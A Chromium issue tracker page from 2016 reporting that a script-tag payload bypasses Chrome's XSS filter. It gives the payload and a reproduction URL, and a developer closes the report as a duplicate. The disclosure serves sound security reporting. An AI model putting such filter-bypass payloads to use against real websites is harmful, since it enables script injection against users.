Issue metadata
Sign in to add a comment
|
Security: XSS filter bypass in Chrome Browser
Reported by
abeont...@gmail.com,
Mar 22 2016
|
||||||||||||||||||||
Issue description
The XSS vector below bypasses current filtering in the Chrome browser:
<script>void('&b=');alert(1);</script>
VERSION
Chrome Version: Version 49.0.2623.87 m - Google Chrome is up to date.
Operating System: [Please indicate OS, version, and service pack level]
REPRODUCTION CASE
http://securitee.tk/files/chrome_xss.php?a=<script>void('&b=');alert(1);</script>
,
Jun 29 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 2 2016
|
|||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||
Comment 1 by tsepez@chromium.org
, Mar 22 2016Status: Duplicate (was: Unconfirmed)